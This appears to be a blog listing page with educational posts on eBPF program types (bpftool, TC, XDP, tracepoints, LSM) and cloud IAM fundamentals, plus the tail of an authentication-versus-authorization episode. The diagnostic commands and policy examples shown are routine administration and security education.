
Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	AuthN and AuthZ are the two core mechanisms; this episode defines the boundary
CISSP	Domain 1 — Security & Risk Management	Conflating the two creates systematic, measurable risk with different attack surfaces
ISO 27001:2022	5.17 Authentication information	Managing credentials and authentication mechanisms across the identity lifecycle
ISO 27001:2022	8.5 Secure authentication	Technical controls — MFA, session management, credential policies
ISO 27001:2022	5.15 Access control	Policy requirements that depend on cleanly separating identity from permission
SOC 2	CC6.1	Logical access controls — this episode defines the two-gate model CC6.1 is built on
SOC 2	CC6.7	Access restrictions enforced at the authorization layer, not just authentication

Key Takeaways

Authentication proves identity; authorization proves permission — two gates, two separate failure modes, two separate fixes
AWS AccessDenied is a Gate 2 failure — the credential is valid, the policy is missing; fix the policy
Short-lived credentials (STS, Managed Identities, instance profiles) reduce the blast radius of a credential compromise from years to hours
MFA hardens Gate 1 — it has no effect on what an authenticated identity can do
HTTP 401 = Gate 1 failed; HTTP 403 = Gate 2 failed — the status code tells you where to look
Application-layer authorization and cloud IAM authorization are independent — both must enforce least privilege

What’s Next

You now know what the two gates are and where failures in each originate. IAM Roles vs Policies: How Cloud Authorization Actually Works goes into the mechanics of Gate 2 — the permissions, policies, and roles that implement authorization in practice, and the structural patterns that keep them from turning into an unmanageable sprawl.

Next: IAM Roles vs Policies: How Cloud Authorization Actually Works

Get the IAM roles vs policies breakdown in your inbox when it publishes → linuxcent.com/subscribe

eBPF Program Types — What’s Actually Running on Your Nodes

May 13, 2026April 12, 2026 by Vamshi Krishna Santhapuri

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 4
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types**

Architecture Overview

eBPF Program Types — tracing, networking, and security hook points across the Linux kernel — Each eBPF program type attaches to a different kernel hook — from socket filters to LSM enforcement points.

TL;DR

bpftool prog list and bpftool net list show every eBPF program on a node — run these first when debugging eBPF-based tool behavior
TC programs can stack on the same interface; stale programs from incomplete Cilium upgrades cause intermittent packet drops — check tc filter show after every Cilium upgrade
XDP fires before sk_buff allocation — fastest hook, but no pod identity; Cilium uses it for service load balancing, not pod policy
XDP silently falls back to generic mode on unsupported NICs — verify with ip link show | grep xdp
Tracepoints are stable across kernel versions; kprobe-based tools may silently break after node OS patches
LSM hooks enforce at the kernel level — what makes Tetragon’s enforcement mode fundamentally different from sidecar-based approaches

The Big Picture

  WHERE eBPF PROGRAM TYPES ATTACH IN THE KERNEL

  NIC hardware
       ↓
  DMA → ring buffer
       ↓
  ┌─────────────────────────────────────────────────┐
  │  XDP hook  (Cilium: service load balancing)     │
  │  Sees: raw packet bytes only. No pod identity.  │
  └─────────────────────────┬───────────────────────┘
                            │ XDP_PASS
                            ▼
  sk_buff allocated
       ↓
  ┌─────────────────────────────────────────────────┐
  │  TC ingress hook  (Cilium: pod policy ingress)  │
  │  Sees: sk_buff + socket + cgroup → pod identity │
  └─────────────────────────┬───────────────────────┘
                            ↓
  netfilter / IP routing
       ↓
  socket → process (syscall boundary)
  ┌─────────────────────────────────────────────────┐
  │  Tracepoint / kprobe  (Falco: syscall monitor)  │
  │  Sees: any kernel event, any process, any pod   │
  └─────────────────────────────────────────────────┘
  ┌─────────────────────────────────────────────────┐
  │  LSM hook  (Tetragon: kernel-level enforcement) │
  │  Sees: security check context. Can DENY.        │
  └─────────────────────────────────────────────────┘
       ↓
  IP routing → qdisc
  ┌─────────────────────────────────────────────────┐
  │  TC egress hook  (Cilium: pod policy egress)    │
  │  Sees: socket + cgroup on outbound traffic      │
  └─────────────────────────────────────────────────┘
       ↓
  NIC → wire

eBPF program types define where in the kernel a hook fires and what it can see — and knowing the difference is what makes you effective when Cilium or Falco behave unexpectedly. What we hadn’t answered — and what a 2am incident eventually forced — is what kind of eBPF programs are actually running on your nodes, and why the difference matters when something breaks.

A pod in production was dropping roughly one in fifty outbound TCP connections. Not all of them — just enough to cause intermittent timeouts in the application logs. NetworkPolicy showed egress allowed. Cilium reported no violations. Running curl manually from inside the pod worked every time.

I spent the better part of three hours eliminating possibilities. DNS. MTU. Node-level conntrack table exhaustion. Upstream firewall rules. Nothing.

Eventually, almost as an afterthought, I ran this:

sudo bpftool prog list

There were two TC programs attached to that pod’s veth interface. One from the current Cilium version. One from the previous version — left behind by a rolling upgrade that hadn’t cleaned up properly. Two programs. Different policy state. One was occasionally dropping packets based on rules that no longer existed in the current policy model.

The answer had been sitting in the kernel the whole time. I just didn’t know where to look.

That incident forced me to actually understand something I’d been hand-waving for two years: eBPF isn’t a single hook. It’s a family of program types, each attached to a different location in the kernel, each seeing different data, each suited for different problems. Understanding the difference is what separates “I run Cilium and Falco” from “I understand what Cilium and Falco are actually doing on my nodes” — and that difference matters when something breaks at 2am.

The Command You Should Run on Your Cluster Right Now

Before getting into the theory, do this:

# See every eBPF program loaded on the node
sudo bpftool prog list

# See every eBPF program attached to a network interface
sudo bpftool net list

On a node running Cilium and Falco, you’ll see something like this:

42: xdp           name cil_xdp_entry       loaded_at 2026-04-01T09:23:41
43: sched_cls     name cil_from_netdev      loaded_at 2026-04-01T09:23:41
44: sched_cls     name cil_to_netdev        loaded_at 2026-04-01T09:23:41
51: cgroup_sock_addr  name cil_sock4_connect loaded_at 2026-04-01T09:23:41
88: raw_tracepoint  name sys_enter          loaded_at 2026-04-01T09:23:55
89: raw_tracepoint  name sys_exit           loaded_at 2026-04-01T09:23:55

Each line is a different program type. Each one fires at a different point in the kernel. The type column — xdp, sched_cls, raw_tracepoint, cgroup_sock_addr — tells you where in the kernel execution path that program is attached and therefore what it can and cannot see.

If you see more programs than you expect on a specific interface — like I did — that’s your first clue.

Why Program Types Exist

The Linux kernel isn’t a single pipeline. Network packets, system calls, file operations, process scheduling — these all run through different subsystems with different execution contexts and different available data.

eBPF lets you attach programs to specific points within those subsystems. The “program type” is the contract: it defines where the hook fires, what data the program receives, and what it’s allowed to do with it. A program designed to process network packets before they hit the kernel stack looks completely different from one designed to intercept system calls across all containers simultaneously.

Most of us will interact with four or five program types through the tools we already run. Understanding what each one actually is — where it sits, what it sees — is what makes you effective when those tools behave unexpectedly.

The Types Behind the Tools You Already Use

TC — Why Cilium Can Tell Which Pod Sent a Packet

TC stands for Traffic Control. It’s where Cilium enforces your NetworkPolicy, and it’s what caused my incident.

TC programs attach to network interfaces — specifically to the ingress and egress directions of the pod’s virtual interface (lxcXXXXX in Cilium’s naming). They fire after the kernel has already processed the packet enough to know its context: which socket created it, which cgroup that socket belongs to. Cgroup maps to container, container maps to pod.

This is the critical piece: TC is how Cilium knows which pod a packet belongs to. Without that cgroup context, per-pod policy enforcement isn’t possible.

# See TC programs on a pod's veth interface
sudo tc filter show dev lxc12345 ingress
sudo tc filter show dev lxc12345 egress

# If you see two entries on the same direction — that's the incident I described
# The priority number (pref 1, pref 2) tells you the order they run

When there are two TC programs on the same interface, the first one to return “drop” wins. The second program never runs. This is why the issue was intermittent rather than consistent — the stale program only matched specific connection patterns.

Fixing it is straightforward once you know what to look for:

# Remove a stale TC filter by its priority number
sudo tc filter del dev lxc12345 egress pref 2

Add this check to your post-upgrade runbook. Cilium upgrades are generally clean but not always.

XDP — Why Cilium Doesn’t Use TC for Everything

If TC is good enough for pod-level policy, why does Cilium also run an XDP program on the node’s main interface? Look at the bpftool prog list output again — there’s an xdp program loaded alongside the TC programs.

XDP fires earlier. Much earlier. Before the kernel allocates any memory for the packet. Before routing. Before connection tracking. Before anything.

The tradeoff is exactly what you’d expect: XDP is fast but context-poor. It sees raw packet bytes. It doesn’t know which pod the packet came from. It can’t read cgroup information because no socket buffer has been allocated yet.

Cilium uses XDP specifically for ClusterIP service load balancing — when a packet arrives at the node destined for a service VIP, XDP rewrites the destination to the actual pod IP in a single map lookup and sends it on its way. No iptables. No conntrack. The work is done before the kernel stack is involved.

There’s a silent failure mode worth knowing about here. XDP runs in one of two modes:

Native mode — runs inside the NIC driver itself, before any kernel allocation. This is where the performance comes from.
Generic mode — fallback when the NIC driver doesn’t support XDP. Runs later, after sk_buff allocation. No performance benefit over iptables.

If your NIC doesn’t support native XDP, Cilium silently falls back to generic mode. The policy still works — but the performance characteristics you assumed aren’t there.

# Check which XDP mode is active on your node's main interface
ip link show eth0 | grep xdp
# xdpdrv  ← native mode (fast)
# xdpgeneric ← generic mode (no perf benefit)

Most cloud provider instance types with modern Mellanox/Intel NICs support native mode. Worth verifying rather than assuming.

Tracepoints — How Falco Sees Every Container

Falco loads two programs: sys_enter and sys_exit. These are raw tracepoints — they fire on every single system call, from every process, in every container on the node.

Tracepoints are explicitly defined and maintained instrumentation points in the kernel. Unlike hooks that attach to specific internal function names (which can be renamed or inlined between kernel versions), tracepoints are stable interfaces. They’re part of the kernel’s public contract with tooling that wants to instrument it.

This matters operationally. When you patch your nodes — and cloud-managed nodes get patched frequently — tools built on tracepoints keep working. Tools built on kprobes (internal function hooks) may silently stop firing if the function they’re attached to gets renamed or inlined by the compiler in a new kernel build.

# Verify what Falco is actually using
sudo bpftool prog list | grep -E "kprobe|tracepoint"

# Falco's current eBPF driver should show raw_tracepoint entries
# If you see kprobe entries from Falco, you're on the older driver
# Check: falco --version and the driver being loaded at startup

If you’re running Falco on a cluster that gets regular OS patch upgrades and you haven’t verified the driver mode, check it. The older kprobe-based driver has a real failure mode on certain kernel versions.

LSM — How Tetragon Blocks Operations at the Kernel Level

LSM hooks run at the kernel’s security decision points: file opens, socket connections, process execution, capability checks. The defining characteristic is that they can deny an operation. Return an error from an LSM hook and the kernel refuses the syscall before it completes.

This is qualitatively different from observability hooks. kprobes and tracepoints watch. LSM hooks enforce.

When you see Tetragon configured to kill a process attempting a privileged operation, or block a container from writing to a specific path, that’s an LSM hook making the decision inside the kernel — not a sidecar watching traffic, not an admission webhook running before pod creation, not a userspace agent trying to act fast enough. The enforcement is in the kernel itself.

# See if any LSM eBPF programs are active on the node
sudo bpftool prog list | grep lsm

# Verify LSM eBPF support on your kernel (required for Tetragon enforcement mode)
grep CONFIG_BPF_LSM /boot/config-$(uname -r)
# CONFIG_BPF_LSM=y   ← required

The Practical Summary

What’s happening on your node	Program type	Where to look
Cilium service load balancing	XDP	`ip link show eth0 \\| grep xdp`
Cilium pod network policy	TC (`sched_cls`)	`tc filter show dev lxcXXXX egress`
Falco syscall monitoring	Tracepoint	`bpftool prog list \\| grep tracepoint`
Tetragon enforcement	LSM	`bpftool prog list \\| grep lsm`
Anything unexpected	All types	`bpftool prog list`, `bpftool net list`

The Incident, Revisited

Three hours of debugging. The answer was a stale TC program sitting at priority 2 on a pod’s veth interface, left behind by an incomplete Cilium upgrade.

# What I should have run first
sudo bpftool net list
sudo tc filter show dev lxc12345 egress

Two commands. Thirty seconds. If I’d known that TC programs can stack on the same interface, I’d have started there.

That’s the point of understanding program types — not to write eBPF programs yourself, but to know where to look when the tools you depend on don’t behave the way you expect. The programs are already there, running on your nodes right now. bpftool prog list shows you all of them.

Key Takeaways

bpftool prog list and bpftool net list show every eBPF program on a node — run these before anything else when debugging eBPF-based tool behavior
TC programs can stack on the same interface; stale programs from incomplete Cilium upgrades cause intermittent drops — check tc filter show after every Cilium upgrade
XDP runs before the kernel stack — fastest hook, but no pod identity; Cilium uses it for service load balancing, not pod policy
XDP silently falls back to generic mode on unsupported NICs — verify with ip link show | grep xdp
Tracepoints are stable across kernel versions; kprobe-based tools may silently break after node OS patches — verify your Falco driver mode
LSM hooks enforce at the kernel level — this is what makes Tetragon’s enforcement mode fundamentally different from sidecar-based approaches

What’s Next

Every eBPF program fires, does its work, and exits — but the work always involves data.

Get EP05 in your inbox when it publishes → linuxcent.com/subscribe Counting connections. Tracking processes. Streaming events to a detection engine. In EP05, I’ll cover eBPF maps: the persistent data layer that connects kernel programs to the tools consuming their output. Understanding maps explains a class of production issues — and makes bpftool map dump useful rather than cryptic.

What Is Cloud IAM — and Why Every API Call Depends on It

May 10, 2026April 11, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes

TL;DR

Cloud IAM is the system that decides whether any API call is allowed or denied — deny by default, explicit Allow required at every layer
Every API call answers four questions: Who? (Identity) What? (Action) On what? (Resource) Under what conditions? (Context)
Two identity types in every cloud account: human (engineers) and machine (Lambda, EC2, Kubernetes pods) — machine identities outnumber human by 10:1 in most production environments
AWS, GCP, and Azure share the same model: deny-by-default, policy-driven, principal-based — different syntax, same mental model
The gap between granted and used permissions is where attackers move — the average IAM entity uses under 5% of its granted permissions
IAM failure has two modes: over-permissioned (“it works”) and over-restricted (“it’s secure, engineers work around it”) — both end in incidents

The Big Picture

                        WHAT IS CLOUD IAM?

  Every API call in AWS, GCP, or Azure answers four questions:

  ┌─────────────┐   ┌─────────────┐   ┌─────────────┐   ┌─────────────┐
  │    WHO?     │   │   WHAT?     │   │  ON WHAT?   │   │  UNDER      │
  │             │   │             │   │             │   │  WHAT?      │
  │  Identity / │   │  Action /   │   │  Resource   │   │             │
  │  Principal  │   │  Permission │   │             │   │  Condition  │
  │             │   │             │   │             │   │             │
  │ IAM Role    │   │ s3:GetObject│   │ arn:aws:s3: │   │ MFA: true   │
  │ Svc Account │   │ ec2:Start   │   │ ::prod-data │   │ IP: 10.0/8  │
  │ Managed     │   │ iam:        │   │ /exports/*  │   │ Time: 09-17 │
  │ Identity    │   │   PassRole  │   │             │   │             │
  └─────────────┘   └─────────────┘   └─────────────┘   └─────────────┘
        └────────────────┴────────────────┴────────────────┘
                                  │
                     ┌────────────▼────────────┐
                     │    IAM Policy Engine    │
                     │    deny by default      │
                     │                         │
                     │  Explicit ALLOW?   ─────┼──→  PERMIT
                     │  Explicit DENY?    ─────┼──→  DENY (overrides Allow)
                     │  No matching rule? ─────┼──→  DENY (implicit)
                     └─────────────────────────┘

Cloud IAM is the answer to a question every growing infrastructure team hits: at scale, how do you know who can do what, why they can do it, and whether they still should?

Introduction

Cloud IAM (Identity and Access Management) is the control plane for access in every major cloud provider. Every API call — reading a file, starting an instance, invoking a function — goes through an IAM evaluation. The result is binary: explicit Allow or deny. There is no implicit access. Nothing is open by default. This is what makes cloud IAM fundamentally different from the access models that came before it.

Understanding why it works that way requires tracing how access control evolved — and what kept breaking at each stage.

A few years into my career managing Linux infrastructure, I was handed a production server audit. The task was straightforward: find out who had access to what. I pulled /etc/passwd, checked the sudoers file, reviewed SSH authorized_keys across the fleet.

Three days later, I had a spreadsheet nobody wanted to read.

The problem wasn’t that the access was wrong. Most of it was fine. The problem was that nobody — not the team lead, not the security team, not the engineers who’d been there five years — could tell me why a particular account had access to a particular server. It had accumulated. People joined, got access, changed teams, left. The access stayed.

That was a 40-server fleet in 2012.

Fast-forward to a cloud environment today: you might have 50 engineers, 300 Lambda functions, 20 microservices, CI/CD pipelines, third-party integrations, compliance scanners — all making API calls, all needing access to something. The identity sprawl problem I spent three days auditing manually on 40 servers now exists at a scale where manual auditing isn’t even a conversation.

This is the problem Identity and Access Management exists to solve. Not just in theory — in practice, at the scale cloud infrastructure demands.

How We Got Here — The Evolution of Access Control

To understand why cloud IAM works the way it does, you need to trace how access control evolved. The design decisions in AWS IAM, GCP, and Azure didn’t come out of nowhere. They’re answers to lessons learned the hard way across decades of broken systems.

The Unix Model (1970s–1990s): Simple and Sufficient

Unix got the fundamentals right early. Every resource (file, device, process) has an owner and a group. Every action is one of three: read, write, execute. Every user is either the owner, in the group, or everyone else.

-rw-r--r--  1 vamshi  engineers  4096 Apr 11 09:00 deploy.conf
# owner can read/write | group can read | others can read

For a single machine or a small network, this model is elegant. The permissions are visible in a ls -l. Reasoning about access is straightforward. Auditing means reading a few files.

However, the cracks started showing when organizations grew. You’d add sudo to give specific commands to specific users. Then sudoers files became 300 lines long. Then you’d have shared accounts because managing individual ones was “too much overhead.” Shared accounts mean no individual accountability. No accountability means no audit trail worth anything.

The Directory Era (1990s–2000s): Centralise or Collapse

As networks grew, every server managing its own /etc/passwd became untenable. Enter LDAP and Active Directory. Instead of distributing identity management across every machine, you centralised it: one directory, one place to add users, one place to disable them when someone left.

This was a significant step forward. Onboarding got faster. Offboarding became reliable. Group membership drove access to resources across the network.

Why Groups Became the New Problem

But the permission model was still coarse. You were either in the Domain Admins group or you weren’t. “Read access to the file share” was a group. “Deploy to the staging web server” was a group. Managing fine-grained permissions at scale meant managing hundreds of groups, and the groups themselves became the audit nightmare.

I spent time in environments like this. The group named SG_Prod_App_ReadWrite_v2_FINAL that nobody could explain. The AD group from a project that ended three years ago but was still in twenty user accounts. The contractor whose AD account was disabled but whose service account was still running a nightly job.

The directory model centralised identity. It didn’t solve the permissions sprawl problem.

The Cloud Shift (2006–2014): Everything Changes

AWS launched EC2 in 2006. In 2011, AWS IAM went into general availability. That date matters — for the first five years of AWS, access control was primitive. Root accounts. Access keys. No roles.

Early AWS environments I’ve seen (and had to clean up) reflect this era: a single root account access key shared across a team, rotated manually on a shared spreadsheet. Static credentials in application config files. EC2 instances with AdministratorAccess because “it was easier at the time.”

The Model That Changed Everything

The AWS team understood what they’d built was dangerous. IAM in 2011 introduced the model that all three major cloud providers now share: deny-by-default, policy-driven, principal-based access control. Not “who is in which group.” The question became: which policy explicitly grants this specific action on this specific resource to this specific identity.

GCP launched its IAM model with a different flavour in 2012 — hierarchical, additive, binding-based. Azure RBAC came to general availability in 2014, built on top of Active Directory’s identity model.

By 2015, the modern cloud IAM era was established. The primitives existed. The problem shifted from “does IAM exist?” to “are we using it correctly?” — and most teams were not.

In practice, that question is still the right one to ask today.

The Problem IAM Actually Solves

Here’s the honest version of what IAM is for, based on what I’ve seen go wrong without it.

Without proper IAM, you get one of two outcomes:

The first is what I call the “it works” environment. Everything runs. The developers are happy. Access requests take five minutes because everyone gets the same broad policy. And then a Lambda function’s execution role — which had s3:* on * because someone once needed to debug something — gets its credentials exposed through an SSRF vulnerability in the app it runs. That role can now read every bucket in the account, including the one with the customer database exports.

The second is the “it’s secure” environment. Access is locked down. Every request goes through a ticket. The ticket goes to a security team that approves it in three to five business days. Engineers work around it by storing credentials locally. The workarounds become the real access model. The formal IAM posture and the actual access posture diverge. The audit finds the formal one. Attackers find the real one.

IAM, done right, is the discipline of walking the line between those two outcomes. It’s not a product you buy or a feature you turn on. It’s a practice — a continuous process of defining what access exists, why it exists, and whether it’s still needed.

The Core Concepts — Taught, Not Listed

Let me walk you through the vocabulary you need, grounded in what each concept means in practice.

Identity: Who Is Making This Request?

An identity is any entity that can hold a credential and make requests. In cloud environments, identities split into two types:

Human identities are engineers, operators, and developers. They authenticate via the console, CLI, or SDK. They should ideally authenticate through a central IdP (Okta, Google Workspace, Entra ID) using federation — more on that in SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?.

Machine identities are everything else: Lambda functions, EC2 instances, Kubernetes pods, CI/CD pipelines, monitoring agents, data pipelines. In most production environments, machine identities outnumber human identities by 10:1 or more.

This ratio matters. When your security model is designed primarily for human access, the 90% of identities that are machines become an afterthought. That’s where access keys end up in environment variables, where Lambda functions get broad permissions because nobody thought carefully about what they actually need, where the real attack surface lives.

Principal: The Authenticated Identity Making a Specific Request

A principal is an identity that has been authenticated and is currently making a request. The distinction from “identity” is subtle but important: the principal includes the context of how the identity authenticated.

In AWS, an IAM role assumed by EC2, assumed by a Lambda, and assumed by a developer’s CLI session are three different principals — even if they all assume the same role. The session context, source, and expiration differ.

{
  "Principal": {
    "AWS": "arn:aws:iam::123456789012:role/DataPipelineRole"
  }
}

In GCP, the equivalent term is member. In Azure, it’s security principal — a user, group, service principal, or managed identity.

Resource: What Is Being Accessed?

A resource is whatever is being acted upon. In AWS, every resource has an ARN (Amazon Resource Name) — a globally unique identifier.

arn:aws:s3:::customer-data-prod          # S3 bucket
arn:aws:s3:::customer-data-prod/*        # everything inside that bucket
arn:aws:ec2:ap-south-1:123456789012:instance/i-0abcdef1234567890
arn:aws:iam::123456789012:role/DataPipelineRole

The ARN structure tells you: service, region, account, resource type, resource name. Once you can read ARNs fluently, IAM policies become much less intimidating.

Action: What Is Being Done?

An action (AWS/Azure) or permission (GCP) is the operation being attempted. Cloud providers express these as service:Operation strings:

# AWS
s3:GetObject           # read a specific object
s3:PutObject           # write an object
s3:DeleteObject        # delete an object — treat differently than read
iam:PassRole           # assign a role to a service — one of the most dangerous permissions
ec2:DescribeInstances  # list instances — often overlooked, but reveals infrastructure

# GCP
storage.objects.get
storage.objects.create
iam.serviceAccounts.actAs   # impersonate a service account — equivalent to iam:PassRole danger

When I audit IAM configurations, I pay special attention to any policy that includes iam:*, iam:PassRole, or wildcards like "Action": "*". These are the permissions that let a compromised identity create new identities, assign itself more power, or impersonate other accounts. They’re the privilege escalation primitives — more on that in AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise.

Policy: The Document That Connects Everything

A policy is a document that says: this principal can perform these actions on these resources, under these conditions.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadCustomerDataBucket",
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::customer-data-prod",
        "arn:aws:s3:::customer-data-prod/*"
      ]
    }
  ]
}

Notice what’s explicit here: the effect (Allow), the exact actions (not s3:*), and the exact resource (not *). Every word in this document is a deliberate decision. The moment you start using wildcards to save typing, you’re writing technical debt that will come back as a security incident.

How IAM Actually Works — The Decision Flow

When any API call hits a cloud service, an IAM engine evaluates it. Understanding this flow is the foundation of debugging access issues, and more importantly, of understanding why your security posture is what it is.

Request arrives:
  Action:    s3:PutObject
  Resource:  arn:aws:s3:::customer-data-prod/exports/2026-04-11.csv
  Principal: arn:aws:iam::123456789012:role/DataPipelineRole
  Context:   { source_ip: "10.0.2.15", mfa: false, time: "02:30 UTC" }

IAM Engine evaluation (AWS):
  1. Is there an explicit Deny anywhere? → No
  2. Does the SCP (if any) allow this? → Yes
  3. Does the identity-based policy allow this? → Yes (via DataPipelinePolicy)
  4. Does the resource-based policy (bucket policy) allow or deny? → No explicit rule → implicit allow for same-account
  5. Is there a permissions boundary? → No
  Decision: ALLOW

The critical insight here: cloud IAM is deny-by-default. There is no implicit allow. If there is no policy that explicitly grants s3:PutObject to this role on this bucket, the request fails. The only way in is through an explicit "Effect": "Allow".

This is the opposite of how most traditional systems work. In a Unix permission model, if your file is world-readable (-r--r--r--), anyone can read it unless you actively restrict them. In cloud IAM, nothing is accessible unless you actively grant it.

When I’m debugging an AccessDenied error — and every engineer who works with cloud IAM spends significant time doing this — the mental model is always: “what is the chain of explicit Allows that should be granting this access, and at which layer is it missing?”

Why This Is Harder Than It Looks

Understanding the concepts is the easy part. The hard part is everything that happens at organisational scale over time.

Scale. A real AWS account in a growing company might have 600+ IAM roles, 300+ policies, and 40+ cross-account trust relationships. None of these were designed together. They evolved incrementally, each change made by someone who understood the context at the time and may have left the organisation since. The cumulative effect is an IAM configuration that no single person fully understands.

Drift. IAM configs don’t stay clean. An engineer needs to debug a production issue at 2 AM and grants themselves broad access temporarily. The temporary access never gets revoked. Multiply that by a team of 20 over three years. I’ve audited environments where 60% of the permissions in a role had never been used — not once — in the 90-day CloudTrail window. That unused 60% is pure attack surface.

The machine identity blind spot. Most IAM governance practices were built for human users. Service accounts, Lambda roles, and CI/CD pipeline identities get created rapidly and reviewed rarely. In my experience, these are the identities most likely to have excess permissions, least likely to be in the access review process, and most likely to be the initial foothold in a cloud breach.

The gap between granted and used. That said, this one surprised me most when I first started doing cloud security work. AWS data from real customer accounts shows the average IAM entity uses less than 5% of its granted permissions. That 95% excess isn’t just waste — it’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.

IAM Across AWS, GCP, and Azure — The Conceptual Map

The three major providers implement IAM differently in syntax, but the same model underlies all of them. Once you understand one deeply, the others become a translation exercise.

Concept	AWS	GCP	Azure
Identity store	IAM users / roles	Google accounts, Workspace	Entra ID
Machine identity	IAM Role (via instance profile or AssumeRole)	Service Account	Managed Identity
Access grant mechanism	Policy document attached to identity or resource	IAM binding on resource (member + role + condition)	Role Assignment (principal + role + scope)
Hierarchy	Account is the boundary; Org via SCPs	Org → Folder → Project → Resource	Tenant → Management Group → Subscription → Resource Group → Resource
Default stance	Deny	Deny	Deny
Wildcard risk	`"Action": ""` on `"Resource": ""`	Primitive roles (viewer/editor/owner)	`Owner` or `Contributor` assigned broadly

The hierarchy point is worth pausing on. AWS is relatively flat — the account is the primary security boundary. GCP’s hierarchy means a binding at the Organisation level propagates down to every project. Azure’s hierarchy means a role assignment at the Management Group level flows through every subscription beneath it.

The blast radius of a misconfiguration scales with how high in the hierarchy it sits.

This will matter in GCP IAM Policy Inheritance and Azure RBAC Explained when we go deep on GCP and Azure specifically. For now, the takeaway is: understand where in the hierarchy a permission is granted, because the same permission granted at the wrong level has a very different security implication.

Framework Alignment

If you’re mapping this episode to a control framework — for a compliance audit, a certification study, or building a security program — here’s where it lands:

Framework	Reference	What It Covers Here
CISSP	Domain 1 — Security & Risk Management	IAM as a risk reduction control; blast radius is a risk variable
CISSP	Domain 5 — Identity and Access Management	Direct implementation: who can do what, to which resources, under what conditions
ISO 27001:2022	5.15 Access control	Policy requirements for restricting access to information and systems
ISO 27001:2022	5.16 Identity management	Managing the full lifecycle of identities in the organization
ISO 27001:2022	5.18 Access rights	Provisioning, review, and removal of access rights
SOC 2	CC6.1	Logical access security controls to protect against unauthorized access
SOC 2	CC6.3	Access removal and review processes to limit unauthorized access

Key Takeaways

IAM evolved from Unix file permissions → directory services → cloud policy engines, driven by scale and the failure modes of each prior model
Cloud IAM is deny-by-default: every access requires an explicit Allow somewhere in the policy chain
Identities are human or machine; in production, machines dominate — and they’re the under-governed majority
A policy binds a principal to actions on resources; every word is a deliberate security decision
The hardest IAM problems aren’t technical — they’re organisational: drift, unused permissions, machine identities nobody owns, and access reviews that never happen
The gap between granted and used permissions is where attackers find room to move

What’s Next

Now that you understand what IAM is and why it exists, the next question is the one that trips up even experienced engineers: what’s the difference between authentication and authorization, and why does conflating them cause security failures?

EP02 works through both — how cloud providers implement each, where the boundary sits, and why getting this boundary wrong creates exploitable gaps.

Next: Authentication vs Authorization: AWS AccessDenied Explained

Get EP02 in your inbox when it publishes → subscribe